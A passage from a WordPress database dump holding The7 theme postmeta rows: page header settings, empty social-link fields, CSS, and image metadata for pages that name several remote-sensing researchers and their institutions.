(12697,2745,'_dt_teammate_options_soundcloud',''),
(12698,2745,'_dt_teammate_options_viber',''),
(12699,2745,'_dt_teammate_options_whatsapp',''),
(12700,2745,'_dt_teammate_options_reddit',''),
(12701,2745,'_dt_teammate_options_snapchat',''),
(12702,2745,'_dt_teammate_options_telegram',''),
(12703,2745,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12704,2747,'_edit_lock','1668035059:1'),
(12705,2748,'_wp_attached_file','2022/10/w112-e1668035020178.jpg'),
(12706,2748,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:180;s:4:\"file\";s:31:\"2022/10/w112-e1668035020178.jpg\";s:8:\"filesize\";i:72630;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"w112-e1668035020178-120x150.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12707,2747,'_thumbnail_id','2748'),
(12708,2747,'_edit_last','1'),
(12709,2747,'_dt_sidebar_position','disabled'),
(12710,2747,'_dt_sidebar_widgetarea_id','sidebar_1'),
(12711,2747,'_dt_sidebar_hide_on_mobile','0'),
(12712,2747,'_dt_footer_show','1'),
(12713,2747,'_dt_footer_widgetarea_id','sidebar_2'),
(12714,2747,'_dt_footer_hide_on_mobile','0'),
(12715,2747,'_dt_header_title','fancy'),
(12716,2747,'_dt_header_background','normal'),
(12717,2747,'_dt_header_background_below_slideshow','disabled'),
(12718,2747,'_dt_header_transparent_bg_color_scheme','light'),
(12719,2747,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(12720,2747,'_dt_header_transparent_top_bar_bg_opacity','25'),
(12721,2747,'_dt_header_transparent_bg_color','#000000'),
(12722,2747,'_dt_header_transparent_bg_opacity','50'),
(12723,2747,'_dt_header_disabled_background','normal'),
(12724,2747,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(12725,2747,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(12726,2747,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(12727,2747,'_dt_header_disabled_transparent_bg_color','#000000'),
(12728,2747,'_dt_header_disabled_transparent_bg_opacity','50'),
(12729,2747,'_dt_page_overrides_top_margin',''),
(12730,2747,'_dt_page_overrides_right_margin',''),
(12731,2747,'_dt_page_overrides_bottom_margin',''),
(12732,2747,'_dt_page_overrides_left_margin',''),
(12733,2747,'_dt_mobile_page_padding_top',''),
(12734,2747,'_dt_mobile_page_padding_right',''),
(12735,2747,'_dt_mobile_page_padding_bottom',''),
(12736,2747,'_dt_mobile_page_padding_left',''),
(12737,2747,'_dt_fancy_header_layout_heading',''),
(12738,2747,'_dt_fancy_header_title_aligment','center'),
(12739,2747,'_dt_fancy_header_height','300'),
(12740,2747,'_dt_fancy_header_padding-top','0px'),
(12741,2747,'_dt_fancy_header_padding-bottom','0px'),
(12742,2747,'_dt_fancy_header_breadcrumbs_heading',''),
(12743,2747,'_dt_fancy_header_breadcrumbs','disabled'),
(12744,2747,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12745,2747,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12746,2747,'_dt_fancy_header_title_heading',''),
(12747,2747,'_dt_fancy_header_title_mode','custom'),
(12748,2747,'_dt_fancy_header_title','Junichi Susaki Kyoto University, Japan (WG III/3)'),
(12749,2747,'_dt_fancy_header_title_font_size','30'),
(12750,2747,'_dt_fancy_header_title_line_height','36'),
(12751,2747,'_dt_fancy_header_text_transform','none'),
(12752,2747,'_dt_fancy_header_title_color_mode','color'),
(12753,2747,'_dt_fancy_header_title_color','#ffffff'),
(12754,2747,'_dt_fancy_header_subtitle_heading',''),
(12755,2747,'_dt_fancy_header_subtitle',''),
(12756,2747,'_dt_fancy_header_subtitle_font_size','18'),
(12757,2747,'_dt_fancy_header_subtitle_line_height','26'),
(12758,2747,'_dt_fancy_header_subtitle_text_transform','none'),
(12759,2747,'_dt_fancy_header_subtitle_color_mode','color'),
(12760,2747,'_dt_fancy_header_subtitle_color','#ffffff'),
(12761,2747,'_dt_fancy_header_bg_heading',''),
(12762,2747,'_dt_fancy_header_bg_color','#222222'),
(12763,2747,'_dt_fancy_header_bg_image_origin','custom'),
(12764,2747,'_dt_fancy_header_bg_image','a:0:{}'),
(12765,2747,'_dt_fancy_header_bg_repeat','no-repeat'),
(12766,2747,'_dt_fancy_header_bg_position_x','center'),
(12767,2747,'_dt_fancy_header_bg_position_y','center'),
(12768,2747,'_dt_fancy_header_bg_fullscreen','1'),
(12769,2747,'_dt_fancy_header_bg_overlay','0'),
(12770,2747,'_dt_fancy_header_overlay_color','#000'),
(12771,2747,'_dt_fancy_header_bg_overlay_opacity','50'),
(12772,2747,'_dt_fancy_header_scroll_effect','default'),
(12773,2747,'_dt_fancy_header_bg_parallax','0.5'),
(12774,2747,'_dt_fancy_header_responsiveness_heading',''),
(12775,2747,'_dt_fancy_header_responsiveness','enabled'),
(12776,2747,'_dt_fancy_header_responsiveness_switch','778px'),
(12777,2747,'_dt_fancy_header_responsive_height','70'),
(12778,2747,'_dt_fancy_header_responsive_font_size','30'),
(12779,2747,'_dt_fancy_header_responsive_title_line_height','38'),
(12780,2747,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12781,2747,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12782,2747,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12783,2747,'_dt_teammate_options_go_to_single','1'),
(12784,2747,'_dt_teammate_options_position',''),
(12785,2747,'_dt_teammate_options_website',''),
(12786,2747,'_dt_teammate_options_mail',''),
(12787,2747,'_dt_teammate_options_facebook',''),
(12788,2747,'_dt_teammate_options_twitter',''),
(12789,2747,'_dt_teammate_options_dribbble',''),
(12790,2747,'_dt_teammate_options_you-tube',''),
(12791,2747,'_dt_teammate_options_rss',''),
(12792,2747,'_dt_teammate_options_delicious',''),
(12793,2747,'_dt_teammate_options_flickr',''),
(12794,2747,'_dt_teammate_options_lastfm',''),
(12795,2747,'_dt_teammate_options_linkedin',''),
(12796,2747,'_dt_teammate_options_vimeo',''),
(12797,2747,'_dt_teammate_options_tumbler',''),
(12798,2747,'_dt_teammate_options_pinterest',''),
(12799,2747,'_dt_teammate_options_devian',''),
(12800,2747,'_dt_teammate_options_skype',''),
(12801,2747,'_dt_teammate_options_github',''),
(12802,2747,'_dt_teammate_options_instagram',''),
(12803,2747,'_dt_teammate_options_stumbleupon',''),
(12804,2747,'_dt_teammate_options_behance',''),
(12805,2747,'_dt_teammate_options_px-500',''),
(12806,2747,'_dt_teammate_options_tripedvisor',''),
(12807,2747,'_dt_teammate_options_vk',''),
(12808,2747,'_dt_teammate_options_foursquare',''),
(12809,2747,'_dt_teammate_options_xing',''),
(12810,2747,'_dt_teammate_options_weibo',''),
(12811,2747,'_dt_teammate_options_odnoklassniki',''),
(12812,2747,'_dt_teammate_options_research-gate',''),
(12813,2747,'_dt_teammate_options_yelp',''),
(12814,2747,'_dt_teammate_options_blogger',''),
(12815,2747,'_dt_teammate_options_soundcloud',''),
(12816,2747,'_dt_teammate_options_viber',''),
(12817,2747,'_dt_teammate_options_whatsapp',''),
(12818,2747,'_dt_teammate_options_reddit',''),
(12819,2747,'_dt_teammate_options_snapchat',''),
(12820,2747,'_dt_teammate_options_telegram',''),
(12821,2747,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12822,2749,'_edit_lock','1668034927:1'),
(12823,2750,'_wp_attached_file','2022/10/w113.jpg'),
(12824,2750,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2022/10/w113.jpg\";s:8:\"filesize\";i:53345;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w113-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4770;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12825,2749,'_thumbnail_id','2764'),
(12826,2749,'_edit_last','1'),
(12827,2749,'_dt_sidebar_position','disabled'),
(12828,2749,'_dt_sidebar_widgetarea_id','sidebar_1'),
(12829,2749,'_dt_sidebar_hide_on_mobile','0'),
(12830,2749,'_dt_footer_show','1'),
(12831,2749,'_dt_footer_widgetarea_id','sidebar_2'),
(12832,2749,'_dt_footer_hide_on_mobile','0'),
(12833,2749,'_dt_header_title','fancy'),
(12834,2749,'_dt_header_background','normal'),
(12835,2749,'_dt_header_background_below_slideshow','disabled'),
(12836,2749,'_dt_header_transparent_bg_color_scheme','light'),
(12837,2749,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(12838,2749,'_dt_header_transparent_top_bar_bg_opacity','25'),
(12839,2749,'_dt_header_transparent_bg_color','#000000'),
(12840,2749,'_dt_header_transparent_bg_opacity','50'),
(12841,2749,'_dt_header_disabled_background','normal'),
(12842,2749,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(12843,2749,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(12844,2749,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(12845,2749,'_dt_header_disabled_transparent_bg_color','#000000'),
(12846,2749,'_dt_header_disabled_transparent_bg_opacity','50'),
(12847,2749,'_dt_page_overrides_top_margin',''),
(12848,2749,'_dt_page_overrides_right_margin',''),
(12849,2749,'_dt_page_overrides_bottom_margin',''),
(12850,2749,'_dt_page_overrides_left_margin',''),
(12851,2749,'_dt_mobile_page_padding_top',''),
(12852,2749,'_dt_mobile_page_padding_right',''),
(12853,2749,'_dt_mobile_page_padding_bottom',''),
(12854,2749,'_dt_mobile_page_padding_left',''),
(12855,2749,'_dt_fancy_header_layout_heading',''),
(12856,2749,'_dt_fancy_header_title_aligment','center'),
(12857,2749,'_dt_fancy_header_height','300'),
(12858,2749,'_dt_fancy_header_padding-top','0px'),
(12859,2749,'_dt_fancy_header_padding-bottom','0px'),
(12860,2749,'_dt_fancy_header_breadcrumbs_heading',''),
(12861,2749,'_dt_fancy_header_breadcrumbs','disabled'),
(12862,2749,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12863,2749,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12864,2749,'_dt_fancy_header_title_heading',''),
(12865,2749,'_dt_fancy_header_title_mode','custom'),
(12866,2749,'_dt_fancy_header_title','Xinming Tang Land Satellite Remote Sensing Application Center (LASAC), Ministry of Natural Resources of China (TCI)'),
(12867,2749,'_dt_fancy_header_title_font_size','30'),
(12868,2749,'_dt_fancy_header_title_line_height','36'),
(12869,2749,'_dt_fancy_header_text_transform','none'),
(12870,2749,'_dt_fancy_header_title_color_mode','color'),
(12871,2749,'_dt_fancy_header_title_color','#ffffff'),
(12872,2749,'_dt_fancy_header_subtitle_heading',''),
(12873,2749,'_dt_fancy_header_subtitle',''),
(12874,2749,'_dt_fancy_header_subtitle_font_size','18'),
(12875,2749,'_dt_fancy_header_subtitle_line_height','26'),
(12876,2749,'_dt_fancy_header_subtitle_text_transform','none'),
(12877,2749,'_dt_fancy_header_subtitle_color_mode','color'),
(12878,2749,'_dt_fancy_header_subtitle_color','#ffffff'),
(12879,2749,'_dt_fancy_header_bg_heading',''),
(12880,2749,'_dt_fancy_header_bg_color','#222222'),
(12881,2749,'_dt_fancy_header_bg_image_origin','custom'),
(12882,2749,'_dt_fancy_header_bg_image','a:0:{}'),
(12883,2749,'_dt_fancy_header_bg_repeat','no-repeat'),
(12884,2749,'_dt_fancy_header_bg_position_x','center'),
(12885,2749,'_dt_fancy_header_bg_position_y','center'),
(12886,2749,'_dt_fancy_header_bg_fullscreen','1'),
(12887,2749,'_dt_fancy_header_bg_overlay','0'),
(12888,2749,'_dt_fancy_header_overlay_color','#000'),
(12889,2749,'_dt_fancy_header_bg_overlay_opacity','50'),
(12890,2749,'_dt_fancy_header_scroll_effect','default'),
(12891,2749,'_dt_fancy_header_bg_parallax','0.5'),
(12892,2749,'_dt_fancy_header_responsiveness_heading',''),
(12893,2749,'_dt_fancy_header_responsiveness','enabled'),
(12894,2749,'_dt_fancy_header_responsiveness_switch','778px'),
(12895,2749,'_dt_fancy_header_responsive_height','70'),
(12896,2749,'_dt_fancy_header_responsive_font_size','30'),
(12897,2749,'_dt_fancy_header_responsive_title_line_height','38'),
(12898,2749,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(12899,2749,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(12900,2749,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(12901,2749,'_dt_teammate_options_go_to_single','1'),
(12902,2749,'_dt_teammate_options_position',''),
(12903,2749,'_dt_teammate_options_website',''),
(12904,2749,'_dt_teammate_options_mail',''),
(12905,2749,'_dt_teammate_options_facebook',''),
(12906,2749,'_dt_teammate_options_twitter',''),
(12907,2749,'_dt_teammate_options_dribbble',''),
(12908,2749,'_dt_teammate_options_you-tube',''),
(12909,2749,'_dt_teammate_options_rss',''),
(12910,2749,'_dt_teammate_options_delicious',''),
(12911,2749,'_dt_teammate_options_flickr',''),
(12912,2749,'_dt_teammate_options_lastfm',''),
(12913,2749,'_dt_teammate_options_linkedin',''),
(12914,2749,'_dt_teammate_options_vimeo',''),
(12915,2749,'_dt_teammate_options_tumbler',''),
(12916,2749,'_dt_teammate_options_pinterest',''),
(12917,2749,'_dt_teammate_options_devian',''),
(12918,2749,'_dt_teammate_options_skype',''),
(12919,2749,'_dt_teammate_options_github',''),
(12920,2749,'_dt_teammate_options_instagram',''),
(12921,2749,'_dt_teammate_options_stumbleupon',''),
(12922,2749,'_dt_teammate_options_behance',''),
(12923,2749,'_dt_teammate_options_px-500',''),
(12924,2749,'_dt_teammate_options_tripedvisor',''),
(12925,2749,'_dt_teammate_options_vk',''),
(12926,2749,'_dt_teammate_options_foursquare',''),
(12927,2749,'_dt_teammate_options_xing',''),
(12928,2749,'_dt_teammate_options_weibo',''),
(12929,2749,'_dt_teammate_options_odnoklassniki',''),
(12930,2749,'_dt_teammate_options_research-gate',''),
(12931,2749,'_dt_teammate_options_yelp',''),
(12932,2749,'_dt_teammate_options_blogger',''),
(12933,2749,'_dt_teammate_options_soundcloud',''),
(12934,2749,'_dt_teammate_options_viber',''),
(12935,2749,'_dt_teammate_options_whatsapp',''),
(12936,2749,'_dt_teammate_options_reddit',''),
(12937,2749,'_dt_teammate_options_snapchat',''),
(12938,2749,'_dt_teammate_options_telegram',''),
(12939,2749,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(12940,2751,'_edit_lock','1668034566:1'),
(12941,2752,'_wp_attached_file','2022/10/w114.jpg'),
(12942,2752,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2022/10/w114.jpg\";s:8:\"filesize\";i:53852;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w114-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4512;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(12943,2751,'_thumbnail_id','2763'),
(12944,2751,'_edit_last','1'),
(12945,2751,'_dt_sidebar_position','disabled'),
(12946,2751,'_dt_sidebar_widgetarea_id','sidebar_1'),
(12947,2751,'_dt_sidebar_hide_on_mobile','0'),
(12948,2751,'_dt_footer_show','1'),
(12949,2751,'_dt_footer_widgetarea_id','sidebar_2'),
(12950,2751,'_dt_footer_hide_on_mobile','0'),
(12951,2751,'_dt_header_title','fancy'),
(12952,2751,'_dt_header_background','normal'),
(12953,2751,'_dt_header_background_below_slideshow','disabled'),
(12954,2751,'_dt_header_transparent_bg_color_scheme','light'),
(12955,2751,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(12956,2751,'_dt_header_transparent_top_bar_bg_opacity','25'),
(12957,2751,'_dt_header_transparent_bg_color','#000000'),
(12958,2751,'_dt_header_transparent_bg_opacity','50'),
(12959,2751,'_dt_header_disabled_background','normal'),
(12960,2751,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(12961,2751,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(12962,2751,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(12963,2751,'_dt_header_disabled_transparent_bg_color','#000000'),
(12964,2751,'_dt_header_disabled_transparent_bg_opacity','50'),
(12965,2751,'_dt_page_overrides_top_margin',''),
(12966,2751,'_dt_page_overrides_right_margin',''),
(12967,2751,'_dt_page_overrides_bottom_margin',''),
(12968,2751,'_dt_page_overrides_left_margin',''),
(12969,2751,'_dt_mobile_page_padding_top',''),
(12970,2751,'_dt_mobile_page_padding_right',''),
(12971,2751,'_dt_mobile_page_padding_bottom',''),
(12972,2751,'_dt_mobile_page_padding_left',''),
(12973,2751,'_dt_fancy_header_layout_heading',''),
(12974,2751,'_dt_fancy_header_title_aligment','center'),
(12975,2751,'_dt_fancy_header_height','300'),
(12976,2751,'_dt_fancy_header_padding-top','0px'),
(12977,2751,'_dt_fancy_header_padding-bottom','0px'),
(12978,2751,'_dt_fancy_header_breadcrumbs_heading',''),
(12979,2751,'_dt_fancy_header_breadcrumbs','disabled'),
(12980,2751,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(12981,2751,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(12982,2751,'_dt_fancy_header_title_heading',''),
(12983,2751,'_dt_fancy_header_title_mode','custom'),
(12984,2751,'_dt_fancy_header_title','Yu Wang National Key Laboratory on Microwave Imaging Technology, AIRCAS, China'),
(12985,2751,'_dt_fancy_header_title_font_size','30'),
(12986,2751,'_dt_fancy_header_title_line_height','36'),
(12987,2751,'_dt_fancy_header_text_transform','none'),
(12988,2751,'_dt_fancy_header_title_color_mode','color'),
(12989,2751,'_dt_fancy_header_title_color','#ffffff'),
(12990,2751,'_dt_fancy_header_subtitle_heading',''),
(12991,2751,'_dt_fancy_header_subtitle',''),
(12992,2751,'_dt_fancy_header_subtitle_font_size','18'),
(12993,2751,'_dt_fancy_header_subtitle_line_height','26'),
(12994,2751,'_dt_fancy_header_subtitle_text_transform','none'),
(12995,2751,'_dt_fancy_header_subtitle_color_mode','color'),
(12996,2751,'_dt_fancy_header_subtitle_color','#ffffff'),
(12997,2751,'_dt_fancy_header_bg_heading',''),
(12998,2751,'_dt_fancy_header_bg_color','#222222'),
(12999,2751,'_dt_fancy_header_bg_image_origin','custom'),
(13000,2751,'_dt_fancy_header_bg_image','a:0:{}'),
(13001,2751,'_dt_fancy_header_bg_repeat','no-repeat'),
(13002,2751,'_dt_fancy_header_bg_position_x','center'),
(13003,2751,'_dt_fancy_header_bg_position_y','center'),
(13004,2751,'_dt_fancy_header_bg_fullscreen','1'),
(13005,2751,'_dt_fancy_header_bg_overlay','0'),
(13006,2751,'_dt_fancy_header_overlay_color','#000'),
(13007,2751,'_dt_fancy_header_bg_overlay_opacity','50'),
(13008,2751,'_dt_fancy_header_scroll_effect','default'),
(13009,2751,'_dt_fancy_header_bg_parallax','0.5'),
(13010,2751,'_dt_fancy_header_responsiveness_heading',''),
(13011,2751,'_dt_fancy_header_responsiveness','enabled'),
(13012,2751,'_dt_fancy_header_responsiveness_switch','778px'),
(13013,2751,'_dt_fancy_header_responsive_height','70'),
(13014,2751,'_dt_fancy_header_responsive_font_size','30'),
(13015,2751,'_dt_fancy_header_responsive_title_line_height','38'),
(13016,2751,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13017,2751,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13018,2751,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13019,2751,'_dt_teammate_options_go_to_single','1'),
(13020,2751,'_dt_teammate_options_position',''),
(13021,2751,'_dt_teammate_options_website',''),
(13022,2751,'_dt_teammate_options_mail',''),
(13023,2751,'_dt_teammate_options_facebook',''),
(13024,2751,'_dt_teammate_options_twitter',''),
(13025,2751,'_dt_teammate_options_dribbble',''),
(13026,2751,'_dt_teammate_options_you-tube',''),
(13027,2751,'_dt_teammate_options_rss',''),
(13028,2751,'_dt_teammate_options_delicious',''),
(13029,2751,'_dt_teammate_options_flickr',''),
(13030,2751,'_dt_teammate_options_lastfm',''),
(13031,2751,'_dt_teammate_options_linkedin',''),
(13032,2751,'_dt_teammate_options_vimeo',''),
(13033,2751,'_dt_teammate_options_tumbler',''),
(13034,2751,'_dt_teammate_options_pinterest',''),
(13035,2751,'_dt_teammate_options_devian',''),
(13036,2751,'_dt_teammate_options_skype',''),
(13037,2751,'_dt_teammate_options_github',''),
(13038,2751,'_dt_teammate_options_instagram',''),
(13039,2751,'_dt_teammate_options_stumbleupon',''),
(13040,2751,'_dt_teammate_options_behance',''),
(13041,2751,'_dt_teammate_options_px-500',''),
(13042,2751,'_dt_teammate_options_tripedvisor',''),
(13043,2751,'_dt_teammate_options_vk',''),
(13044,2751,'_dt_teammate_options_foursquare',''),
(13045,2751,'_dt_teammate_options_xing',''),
(13046,2751,'_dt_teammate_options_weibo',''),
(13047,2751,'_dt_teammate_options_odnoklassniki',''),
(13048,2751,'_dt_teammate_options_research-gate',''),
(13049,2751,'_dt_teammate_options_yelp',''),
(13050,2751,'_dt_teammate_options_blogger',''),
(13051,2751,'_dt_teammate_options_soundcloud',''),
(13052,2751,'_dt_teammate_options_viber',''),
(13053,2751,'_dt_teammate_options_whatsapp',''),
(13054,2751,'_dt_teammate_options_reddit',''),
(13055,2751,'_dt_teammate_options_snapchat',''),
(13056,2751,'_dt_teammate_options_telegram',''),
(13057,2751,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    